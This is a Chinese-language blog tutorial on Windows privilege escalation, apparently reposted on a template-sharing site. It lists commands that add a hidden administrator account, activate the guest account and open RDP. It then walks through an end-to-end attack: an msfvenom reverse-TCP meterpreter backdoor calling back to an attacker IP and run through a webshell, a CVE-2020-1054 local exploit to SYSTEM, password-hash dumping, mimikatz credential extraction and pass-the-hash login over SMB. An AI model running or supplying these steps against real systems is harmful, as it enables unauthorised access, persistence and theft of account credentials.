Windows权限提升

这篇具有很好参考价值的文章主要介绍了Windows权限提升。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1.Windows提权前期相关事项

明确事项: 1、明确漏洞编号及版本 2、明确漏洞利用平台及版本 3、确保cmd执行权限正常运行 4、确保服务器相关防护软件情况 systeminfo查看系统补丁:一般的,如果网站安全做好的的情况下,会有几百个补丁

Windows权限提升

2.Windows提权常用命令

whoami 查看当前权限 ipconfig 查看服务器为内网还是外网 quser 查看管理是否在线 systeminfo 查看服务器信息及相应的补丁,可找相应的补丁提权 tasklist 查看当前运行的进程,是否有av,可利用的第三方的服务提权等 net user 查看用户

net user admin adqqq7! /add 添加账户 net localgroup administrators admin /add 将admin这个用户加到管理组 net user guest /active:yes 激活guest账户 net user admin /del 删除admin账户 tasklist /svc 查看进程服务 tasklist /m dll 查看调用某个dll的进程 tasklist /v 显示当前进程和进程用户 qwinsta 显示会话情况 net config workstation 查看当前登陆用户信息 hostname 主机名 set 查看环境变量 net view 显示当前域或工作组中计算机的列表 net statistics workstation 查看主机开机时间 net share 查看共享文件夹 查看3389是否开启,0x0为开,0x1为关 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections

win2012通用,win7开启3389: wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1 wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1 reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

windows server2008开启3389: wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

windows server 2003,windws XP开启3389: wmic path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1

3.Windows提权实战

环境:Win7(admin用户)+ Kali Linux 在做提权实验之前,我们已经拿下了webshell,如何利用漏洞拿下webshell这里就不再赘述

Windows权限提升

使用msf生成一个exe后门;通过Webshell 执行该后门程序 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.142 lport=5555 -f exe -o 5555.exe // lhost 需改成kali机器的IP msf监听端口

Windows权限提升

上传到webshell

Windows权限提升

通过msf去连接5555.exe

msfconsole use exploit/multi/handler options set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.85.137 set lport 5555 run

Windows权限提升

执行5555.exe

Windows权限提升

即可得到meterpreter会话

Windows权限提升

得到一个meterpreter会话之后,getuid发现为普通用户权限

Windows权限提升

backgroud,将会话放入后台

Windows权限提升

利用sessions查看会话

Windows权限提升

sessions -i 1 进入metepreter

Windows权限提升

run post/windows/gather/enum_patches查看补丁信息

Windows权限提升

run post/multi/recon/local_exploit_suggester查询哪些提权exp可以用

Windows权限提升
Windows权限提升

发现cve_2020_1054_drawiconex_lpe可用,background

search cve_2020_1054

Windows权限提升

发现序号为0的是可用的exp use 0

Windows权限提升

show options 发现需要设置session

Windows权限提升

设置session为1,exploit执行

Windows权限提升
Windows权限提升

成功返回meterpreter,getuid发现成功提权至system权限 shell进入cmd的shell,执行whoami,为system权限

Windows权限提升

乱码使用chcp 437即可

Windows权限提升

4.Windows提权后期密码安全性测试

(1、利用run hashdump或者hashdump进行dump服务器hash值

Windows权限提升

解密5b0d25cd4db90127e90bcf4c7c75242a即可获得管理员账号密码,通常为cmd5加密

MD5免费在线解密破解_MD5在线加密-SOMD5

Windows权限提升

(2、利用mimikatz获取管理员账号密码

load kiwi,加载kiwi模块 (如果加载失败,需要手动安装)

Windows权限提升

creds_all,列举系统明文密码

Windows权限提升

kiwi_cmd可以使用mimikatz的全部功能,比如kiwi_cmd sekurlsa::logonpasswords获取明文密码

Windows权限提升

(3、当hash解密不出来的时候,可以利用hash来直接远程登录

注意:以Win7或者Win XP作为靶机时攻击失败,建议使用Windows server 2012作为靶机进行测试 use exploit/windows/smb/psexec set RHOSTS 192.168.1.147 set SMBUser XXXX

set SMBPass aad3b435b51404eeaad3b435b51404ee:1ced49662211f8194549a7b355a5e211 exploit

windows提权总结:

1. 先获得一个 webshell

2. 使⽤msf⽣成⼀个exe后⻔;通过 webshell 执⾏该后⻔程序

3. 得到⼀个meterpreter会话之后,查询哪些提权exp可以⽤

4. 通过MSF利用文章来源地址https://www.toymoban.com/news/detail-474632.html

到了这里,关于Windows权限提升的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 操作系统权限提升(十八)之Linux提权-内核提权

    内核提权是利用Linux内核的漏洞进行提权的,内核漏洞进行提权一般包括三个环节: 1、对目标系统进行信息收集,获取到系统内核信息及版本信息; 2、根据内核版本获取其对应的漏洞以及EXP 3、使用找到的EXP对目标系统发起攻击,完成提权操作 查看Linux操作系统的内核版本

    2024年01月16日
    浏览(45)
  • 操作系统权限提升(十九)之Linux提权-SUID提权

    系列文章 操作系统权限提升(十八)之Linux提权-内核提权 SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似,只是执行程序时获

    2024年02月14日
    浏览(41)
  • Linux权限提升—定时任务、环境变量、权限配置不当、数据库等提权

      在上篇文章中提到了Linux权限提升之前的信息收集操作,这里就不在赘述,在前言中讲上篇文章为提到的内容进行补充,至于其它内容可参考上篇文章。   Linux权限提升—内核、SUID、脏牛等提权   这里提一下,之前在设计找EXP都是使用自动化进行编译,但是就会出现

    2023年04月08日
    浏览(102)
  • 操作系统权限提升(十四)之绕过UAC提权-基于白名单AutoElevate绕过UAC提权

    系列文章 操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述 操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!! 利用白名单程序的本质实际上是劫持注册表,这种方法主要是通过寻找autoElevated属性为

    2024年02月16日
    浏览(37)
  • 操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权

    系列文章 操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!! 拿到一个普通管理员的SHELL,在CS中没有*号代表有UAC 执行添加用户的命令时显示拒绝访问 使用CS自带的插件进行绕过提权 直接提到了system权限

    2024年02月16日
    浏览(42)
  • 提权 - Windows 烂土豆/ dll劫持 /服务权限

    烂土豆结合令牌窃取进行提权,WEB权限提权到system权限。 1.原理 1.欺骗“NT AUTHORITYSYSTEM”账户通过NTLM认证到控制的TCP终端 2.对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITYSYSTEM”账户本地协商一个安全令牌。这个过程通过一系列的Windows API调用实现的。 3.模仿这

    2024年01月19日
    浏览(57)
  • Windows权限提升

    明确事项: 1、明确漏洞编号及版本 2、明确漏洞利用平台及版本 3、确保cmd执行权限正常运行 4、确保服务器相关防护软件情况 systeminfo查看系统补丁:一般的,如果网站安全做好的的情况下,会有几百个补丁 whoami 查看当前权限 ipconfig 查看服务器为内网还是外网 quser 查看管

    2024年02月08日
    浏览(31)
  • [计算机提升] Windows系统权限

    在Windows操作系统中, 权限 是指授予用户或用户组对系统资源进行操作的权利。权限控制是操作系统中重要的安全机制,通过权限控制可以限制用户对系统资源的访问和操作,从而保护系统安全。 Windows操作系统中包含以下几种权限: 文件和文件夹权限 :控制用户对文件和文

    2024年02月07日
    浏览(41)
  • CVE-2021-1675 Windows Print Spooler权限提升漏洞复现

    Microsoft Windows Print Spooler 服务未能限制对RpcAddPrinterDriverEx()函数的访问,该函数可能允许远程身份验证的攻击者以系统权限在易受攻击的系统上执行任意代码。该RpcAddPrinterDriverEx()函数用于在系统上安装打印机驱动程序。此函数的参数之一是DRIVER_CONTAINER对象,它包含有关添加的

    2024年02月06日
    浏览(43)
  • CVE-2023-36874 Windows错误报告服务本地权限提升漏洞分析

    漏洞简介 Windows错误报告服务在提交错误报告前会创建 wermgr.exe 进程,而攻击者使用特殊手法欺骗系统创建伪造的wermgr.exe进程,从而以 system 权限执行代码。 影响版本 危害等级 7.8 ∣ H I G H textcolor{Red}{7.8 | HIGH} 7.8∣ H I G H 漏洞复现 首先在C盘下创建一个目录testsystem32,然后将

    2024年02月11日
    浏览(34)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包